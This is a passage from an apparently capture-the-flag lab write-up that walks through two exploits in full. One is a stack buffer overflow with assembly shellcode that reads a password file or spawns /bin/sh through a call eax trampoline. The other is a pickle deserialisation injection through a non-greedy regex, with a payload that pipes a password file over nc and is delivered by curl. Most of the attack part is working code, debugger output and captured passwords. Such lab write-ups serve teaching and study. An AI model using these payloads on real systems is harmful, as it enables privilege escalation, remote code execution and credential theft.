the binary, let's see what it looks like now:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/8i $ebp - 0x408
   0xffbca040:	mov    esi,0x08049088
   0xffbca046:	mov    al,0x5
   0xffbca048:	mov    ebx,esi
   0xffbca04b:	add    ebx,0x43
   0xffbca04f:	xor    ecx,ecx
   0xffbca052:	mov    BYTE PTR [ebp+0x5a],cl
   0xffbca056:	int    0x80
(gdb) x/w $ebp + 4
0xffbca44c:	0x08049088

Looks great! We still need to make our absolute addresses point to the right thing
though! They should point right to the beginning of the buffer, which is at ebp-0x408,
so let's grab that value:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) print $ebp-0x408
$1 = (void *) 0xffbca040

Open up a hex editor and modify the values:
$ xxd payload > payload.hex
# Replace 8890 0408 with 40a0 bcff
$ xxd -r payload.hex > payload
Now let's see what it looks like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/w $ebp+4
0xffab302c:	0xffbca040

Nice, we got our location into the return address! Let's make sure it still points
to the beginning of the buffer like we want:
(gdb) print $ebp-0x408
$4 = (void *) 0xffab2c20

D'oh! Our address moved. What happened is stack-randomization. To make exactly
the type of thing we're trying to do harder, many modern systems root their stacks
at a random place in memory. It makes it significantly more difficult to hard-code
jumps into code you've injected onto the stack. So what do we do now? Well, one
common technique is to pick a value and try over and over again until that value
happens to be correct. This can be improved on by putting the filler nops at the
beginning of the payload instead of the end, creating a "nop slide", where
the payload will work regardless of which instruction in the nop slide the jump lands on.
This helps a reasonable amount and would almost certainly work with as many nops
as we have, but we can actually use a far more clever technique to remove the
non-determinism entirely. Note that after the call to strcpy, we still have
the address of our buffer in eax:
(gdb) print/x $ebp-0x408
$10 = 0xffab2c20
(gdb) print/x $eax
$11 = 0xffab2c20

We have two occurrences of the absolute address that we need to get rid of. If
we can assume that the address is in eax when our code begins, the first occurrence
is easy. We just need to change our first instruction to mov esi, eax. The
second occurrence is the clever part - if we can find a jmp eax or call eax
instruction somewhere in the binary at an absolute address, we can use that as
our absolute address to return to, and it will then call into our buffer! So
let's go sleuthing, starting with the symbols defined in the .text section,
which we know contain code:
$ objdump -t /levels/level04 | grep .text
080483d0 l    d  .text	00000000              .text
08048400 l     F .text	00000000              __do_global_dtors_aux
08048460 l     F .text	00000000              frame_dummy
08048560 l     F .text	00000000              __do_global_ctors_aux
080484f0 g     F .text	00000005              __libc_csu_fini
080483d0 g     F .text	00000000              _start
08048484 g     F .text	00000020              fun
08048500 g     F .text	0000005a              __libc_csu_init
0804855a g     F .text	00000000              .hidden __i686.get_pc_thunk.bx
080484a4 g     F .text	0000004b              main
(gdb) disassemble __do_global_dtors_aux
# ... Nothing useful
(gdb) disassemble frame_dummy
Dump of assembler code for function frame_dummy:
   0x08048460 <+0>:	push   ebp
   0x08048461 <+1>:	mov    ebp,esp
   0x08048463 <+3>:	sub    esp,0x18
   0x08048466 <+6>:	mov    eax,ds:0x8049f1c
   0x0804846b <+11>:	test   eax,eax
   0x0804846d <+13>:	je     0x8048481 <frame_dummy+33>
   0x0804846f <+15>:	mov    eax,0x0
   0x08048474 <+20>:	test   eax,eax
   0x08048476 <+22>:	je     0x8048481 <frame_dummy+33>
   0x08048478 <+24>:	mov    DWORD PTR [esp],0x8049f1c
   0x0804847f <+31>:	call   eax
   0x08048481 <+33>:	leave
   0x08048482 <+34>:	ret
   0x08048483 <+35>:	nop
End of assembler dump.

Look at that! Right there at 0x0804847f is the call eax we need. Alright, let's
modify our payload one more time:
	BITS 32

	mov esi, eax		; Keep track of location of our code
	xor eax, eax		; Clear eax
	mov al, 5		; `open` syscall
	mov ebx, esi		; Calculate FileName address offset from beginning of code
	add ebx, 52+16		; Code takes 52 bytes, buffer takes 16
	xor ecx, ecx		; Read-only
	mov BYTE [esi+52+16+22+1], cl	; Need 0x0 as last byte in filename for open call. Code takes 52, buffer 16, filename 23 (22+1)
	int 0x80		; Make syscall

	mov ebx, eax		; Put descriptor returned from `open` in ebx for `read` call
	mov al, 3		; `read` syscall
	mov ecx, esi		; Calculate buffer address from beginning of code
	add ecx, 52		; 52 bytes of code, then buffer starts
	mov dl, 16		; Read 16 bytes
	int 0x80		; Make syscall

	mov al, 4		; `sys_write` syscall
	mov bl, 1		; Use stdout
	mov ecx, esi		; Calculate buffer address from beginning of code
	add ecx, 52		; Write from buffer
	xor edx, edx		; Make sure edx is empty
	mov dl, 16		; Write 16 bytes
	int 0x80		; Make syscall

	mov al, 1		; `exit` syscall
	xor ebx, ebx		; Exit code 0
	int 0x80		; Exit

	times 16 db 0x1
	db "/home/level05/.password", 0x1

	times 944 nop

	dd 0x0804847f
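The magic numbers in that listing are all derived from a few sizes, so here's a quick Python sanity check of the arithmetic. The constant names are mine; the 52-byte code size and 1036-byte distance to the return address are the figures from this write-up.

```python
CODE_LEN = 52                        # assembled size of the instructions
BUF_LEN = 16                         # scratch buffer for read/write
FILENAME = b"/home/level05/.password"
BYTES_BEFORE_RETURN = 1036           # 0x408 bytes up to ebp, plus the saved ebp

buf_offset = CODE_LEN                                # used by `add ecx, 52`
filename_offset = CODE_LEN + BUF_LEN                 # used by `add ebx, 52+16`
terminator_offset = filename_offset + len(FILENAME)  # byte cleared via cl
nop_count = BYTES_BEFORE_RETURN - (terminator_offset + 1)

print(buf_offset, filename_offset, terminator_offset, nop_count)
```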

Alright, let's try it out!
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/xw $ebp+4
0xffaf11ec:	0x0804847f
(gdb) x/i 0x0804847f
   0x804847f <frame_dummy+31>:	call   eax
(gdb) print/x $eax
$1 = 0xffaf0de0
(gdb) print/x $ebp-0x408
$2 = 0xffaf0de0
(gdb) disp/i $eip
1: x/i $eip
=> 0x80484a2 <fun+30>:	leave
(gdb) stepi
0x080484a3 in fun ()
1: x/i $eip
=> 0x80484a3 <fun+31>:	ret
(gdb)
Cannot access memory at address 0x90909094
(gdb)
Cannot access memory at address 0x90909094
(gdb)
0xffaf0de2 in ?? ()
1: x/i $eip
=> 0xffaf0de2:	xor    eax,eax
(gdb) stepi
0xffaf0de4 in ?? ()
1: x/i $eip
=> 0xffaf0de4:	mov    al,0x5
(gdb)
0xffaf0de6 in ?? ()
1: x/i $eip
=> 0xffaf0de6:	mov    ebx,esi
(gdb)
0xffaf0de8 in ?? ()
1: x/i $eip
=> 0xffaf0de8:	add    ebx,0x44
(gdb)
0xffaf0deb in ?? ()
1: x/i $eip
=> 0xffaf0deb:	xor    ecx,ecx
(gdb)
0xffaf0ded in ?? ()
1: x/i $eip
=> 0xffaf0ded:	mov    BYTE PTR [esi+0x5b],cl
(gdb)
0xffaf0df0 in ?? ()
1: x/i $eip
=> 0xffaf0df0:	int    0x80
(gdb)
0xffaf0df2 in ?? ()
1: x/i $eip
=> 0xffaf0df2:	mov    ebx,eax
(gdb) print $eax
$3 = -13
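That -13 in eax is worth decoding. On Linux, a raw syscall reports failure by returning a negated errno value, so a few lines of Python can translate it. This is a sketch: describe_syscall_result is a made-up helper, and the -4095..-1 error range is the Linux convention I'm assuming here.

```python
import errno
import os


def describe_syscall_result(eax: int) -> str:
    """Interpret a raw Linux syscall return value."""
    if -4095 <= eax < 0:
        code = -eax
        name = errno.errorcode.get(code, "unknown")
        return f"{name}: {os.strerror(code)}"
    return f"success, returned {eax}"


print(describe_syscall_result(-13))
```

Error 13 is EACCES, which is what you'd expect from trying to open a file you don't have permission to read.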

That was great! It jumped into and ran our code! We got an error from our open
call, but that is to be expected - recall that the setuid mechanism doesn't work
when running under gdb. At this point we just need to cross our fingers and run
it!
$ /levels/level04 "`cat payload`"
WNWfdC5eWkIM
Ta-da! The level05 user has password "WNWfdC5eWkIM".
We wrote some very specific exploit code for the use case of reading out a file
with a known name, but we may not always know exactly what we want to do with
our heightened permissions. Because of this, the most common exploit is to run
a brand new shell instance, which will inherit the heightened permissions. This
looks more similar to our previous exploit using system in that we want to
execute a program by name. Instead of cat, we want to execute the shell found
at /bin/sh. Recall that I speculated that system probably eventually calls
the execve syscall. We're going to call it directly. The execve call is number
11, and its signature is:
int execve(const char *filename, char *const argv[], char *const envp[])
The filename parameter is a pointer to a null-terminated string, argv is a
pointer to an array of null-terminated string arguments to the program, the first
of which is conventionally the name of the file, and envp is the environment the
program should execute under. For filename we need to pass a pointer to the
string /bin/sh, which we can do with the same technique we used for the file
name in our previous payload. We don't need to send any arguments to the program,
but we do need to get the filename in as the first parameter. We'll already have
a pointer to the filename, so we can just pass a pointer to that pointer for argv.
We can safely point to a blank array for envp - a blank array of pointers is
just a single null pointer, which we'll already have at the end of argv, so we'll
just re-use that. I won't go into too much detail on the final result, but most
of it should make sense after working through our previous exploit:
	BITS 32

_code:
	mov esi, eax			; Keep track of location of our code
	xor eax, eax			; Clear eax
	mov al, 11			; `execve` syscall
	lea ebx, [esi+ToFileName]	; ebx gets pointer to filename string
	xor ecx, ecx			; Clear ecx so it can be used to clear some memory
	mov BYTE [esi+ToFileNameEnd], cl; Clear the byte at the end of FileName to make it a valid char*
	lea edx, [esi+ToArgVEnd]	; edx gets the address of the NULL word at the end of argv, representing an empty char*[] for envp
	mov DWORD [edx], ecx		; Clear the word at the end of ArgV to make it a valid char*[]
	lea ecx, [esi+ToArgV]		; ecx gets the address of argv
	mov [ecx], ebx			; Make the first element of argv point to filename
	int 0x80			; Make syscall

	mov al, 1		; `exit` syscall
	xor ebx, ebx		; Exit code 0
	int 0x80		; Exit

	ToFileName equ $-_code	; The distance to the FileName storage
	FileName db "/bin/sh"
	
	ToFileNameEnd equ $-_code	; The distance to the NULL byte ending filename
	FileNameEnd db 0x1
	
	ToArgV equ $-_code	; The distance to the beginning of argv
	FileNamePtr dd 0x01010101

	ToArgVEnd equ $-_code	; The distance to the NULL word ending argv and envp
	ArgVEnd dd 0x01010101

	CodeSize equ $-_code	; Size of code, so that we can calculate how many nops we need

	times 1036-CodeSize nop	; Pad with nops to make the length 1036

	dd 0x0804847f		; Address of instruction of `call eax` or `jmp eax`
Aaaand, it works!
$ /levels/level04 "`cat payload`"
$ whoami
level05
$ cat /home/level05/.password
WNWfdC5eWkIM
This approach is much more flexible - we can probably re-use it in other circumstances
and only need to change the number of no-ops and the address at the end.
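To make that re-use concrete, here's a minimal Python sketch of the payload layout: shellcode first, then no-op padding up to the return address offset, then the address in little-endian order. The `build_payload` name and the stand-in shellcode bytes are assumptions for illustration; 1036 and 0x0804847f are the values from the listing above.

```python
import struct

NOP = b"\x90"  # x86 no-op instruction


def build_payload(shellcode: bytes, pad_to: int, ret_addr: int) -> bytes:
    """Lay out shellcode + nop padding + 32-bit little-endian return address."""
    if len(shellcode) > pad_to:
        raise ValueError("shellcode is longer than the padded region")
    padding = NOP * (pad_to - len(shellcode))
    payload = shellcode + padding + struct.pack("<I", ret_addr)
    # The payload is passed through argv, so a NUL byte would cut it short.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte")
    return payload


# Hypothetical stand-in for the assembled shellcode bytes.
example = build_payload(b"\x31\xc0\xb0\x0b", pad_to=1036, ret_addr=0x0804847F)
```

For a different target, only `pad_to` and `ret_addr` should need to change, assuming the same `call eax` style of entry into the code.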
Level 5

Log in as level05 with WNWfdC5eWkIM as the password.
The deal is that the level06 user is running an uppercaser service, which is
accessible through HTTP on port 9020. Let's take a look:
$ curl 127.0.0.1:9020 -d 'hello friend'
{
    "processing_time": 1.0967254638671875e-05,
    "queue_time": 0.6934969425201416,
    "result": "HELLO FRIEND"
}
Not too much to go on here, but it's definitely interesting that we are getting
timing information. Could be that we can formulate an attack that uses the timing
information to leak something important to us. This is the first level that uses
python, with the code living directly in the setuid executable /levels/level05.
It's too long to copy here, so we'll just pick and choose the interesting parts
as we go.
From an exploitation perspective, there are two major red flags, which we'll be
exploiting, both of which live in a single method:
    def deserialize(serialized):
        logger.debug('Deserializing: %r' % serialized)
        parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
        match = parser.match(serialized)
        direction = match.group(1)
        data = match.group(2)
        job = pickle.loads(match.group(3))
        return direction, data, job
The first thing that jumps out is the known-exploitable pickle library. Its
documentation features a prominent warning:
Warning: The pickle module is not intended to be secure against erroneous or
maliciously constructed data. Never unpickle data received from an untrusted or
unauthenticated source.

This is not an idle warning - pickle can be used to execute nearly arbitrary
code. It is possible to use pickle securely, but it requires a high level of
paranoia about the data being processed. At first blush, the deserialize method
doesn't appear to unpickle user data. The only data we control should be the
portion matched by the data: (.*?); part of the regex. That's where the second
red flag comes in: that group is non-greedy, so it stops at the first ; job: it
sees. Anything we put after a ; job: of our own lands in the job: (.*?) match
group, which we aren't meant to control. Demonstration:
>>> import pickle, re
>>> data = "realdata; job: fakejob"
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(2)
'realdata'
>>> match.group(3)
"fakejob; job: S'realjob'\np0\n."

Oops, whatever we pass after ; job:  will get passed directly to pickle.loads -
just what the docs told us not to allow! So let's look at how you actually exploit
pickle. A pickled string is actually a self-contained stack-based programming
language, so it's possible to learn its language and write your exploit directly
in it. That's a pain, so fortunately there's a shortcut - when dumping an object,
pickle will look for a method called __reduce__, and use its return value to
construct the string. The return value is meant to be a tuple holding something
callable and a tuple of arguments to that callable. Here's an example:
import subprocess
class Echo(object):
  def __reduce__(self):
    return (subprocess.Popen, (('echo', 'blah'),))
import pickle
>>> x = Echo()
>>> pickle.dumps(x)
"csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> pickle.loads(_)
blah

That's actually not the scary part. In a completely new python instance on any
machine with a python interpreter, I can now do:
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n.")

That string is a self-contained echo-er anywhere I can manage to get it into a
pickle.loads call. To underscore the point by putting things together:
import pickle
import re
>>> data = "realdata; job: csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(3)
>>> pickle.loads(match.group(3))
blah
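Two details make this work: the non-greedy data group stops at the first ; job: it finds, and pickle.loads stops reading at the first STOP opcode (the trailing .), so the legitimate job that follows our payload is never parsed. Here's a minimal Python 3 sketch of both, using a harmless callable (int) in place of subprocess.Popen. The `Harmless` class is hypothetical, and the regex is the one from deserialize adapted to bytes:

```python
import pickle
import re


class Harmless(object):
    # Stand-in for the exploit class: unpickling this calls int("42").
    def __reduce__(self):
        return (int, ("42",))


# Protocol 0 is the text-based pickle format shown in this write-up.
injected = pickle.dumps(Harmless(), protocol=0)
real_job = pickle.dumps("realjob", protocol=0)

# The only field we control is data, but we smuggle our own "; job: " into it.
data = b"realdata; job: " + injected
serialized = b"type: %s; data: %s; job: %s" % (b"RESULT", data, real_job)

parser = re.compile(rb"^type: (.*?); data: (.*?); job: (.*?)$", re.DOTALL)
match = parser.match(serialized)

# group(3) is our pickle followed by "; job: " and the real pickle.
job_field = match.group(3)

# Loading ends at our STOP opcode, so the trailing bytes are ignored.
result = pickle.loads(job_field)
```

Here `result` is the return value of the injected call, not the string "realjob" that the service meant to unpickle.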

Ok, now that we know we can inject behavior into the server using a bad regex and
pickle, we can start thinking about how to take advantage of it. It seems like
the least fussy thing to do is to send the password over the local network. The
nc tool is great for stuff like this. Let's play around with it a bit:
$ nc -l 127.0.0.1 12345 &
[2] 9513
$ nc 127.0.0.1 12345 < /home/level05/.password
WNWfdC5eWkIM
Pretty straightforward - we set up a background process listening on a port and
then send some data through that port, which gets printed by the listening process.
We don't quite have it in the format we need it in to work with subprocess.Popen
because < /home/level05/.password isn't a normal command argument. What we need
is to send the entire command as an argument to the shell binary itself:
$ nc -l 127.0.0.1 12345 &
[2] 9527
$ /bin/sh -c "nc 127.0.0.1 12345 < /home/level05/.password"
WNWfdC5eWkIM
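The difference is easy to see from Python. This is a small sketch, assuming a POSIX /bin/sh and using a temporary file as a hypothetical stand-in for the password file: without a shell, < is handed to the program as a literal argument, while /bin/sh -c parses it as a redirection.

```python
import os
import subprocess
import sys
import tempfile

# Hypothetical stand-in for the password file.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
    f.write("secret\n")
    path = f.name

# Without a shell, "<" is just another entry in the child's argv.
show_args = "import sys; print(sys.argv[1:])"
literal = subprocess.run(
    [sys.executable, "-c", show_args, "<", path],
    capture_output=True, text=True,
).stdout

# With /bin/sh -c, the shell performs the redirection itself.
# "sh" fills $0 and the file path becomes $1 inside the command string.
via_shell = subprocess.run(
    ["/bin/sh", "-c", 'read -r line < "$1"; echo "$line"', "sh", path],
    capture_output=True, text=True,
).stdout

os.remove(path)
```

The first call only echoes its arguments back, `<` included; the second actually reads the file.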
Now we're just executing a single program with two arguments. Here's our pickle
exploiting stub:
import subprocess
class NcPassword(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh', '-c', 'nc 127.0.0.1 12345 < /home/level05/.password'),))
This generates this payload:
"csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n."

Which works as expected:
$ nc -l 127.0.0.1 12345 &
[2] 9552
$ python
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n.")
WNWfdC5eWkIM
At this point it's almost too easy - we change the path in our payload to point
to /home/level06/.password, start our listener, and post to the service with the
payload after ; job: :
$ nc -l 127.0.0.1 12345 &
$ curl 127.0.0.1:9020 -d "`echo -e "; job: csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level06/.password'\np3\ntp4\ntp5\nRp6\n."`"
18aRISxV3MUS
{
    "result": "Job timed out"
}
Ohai password.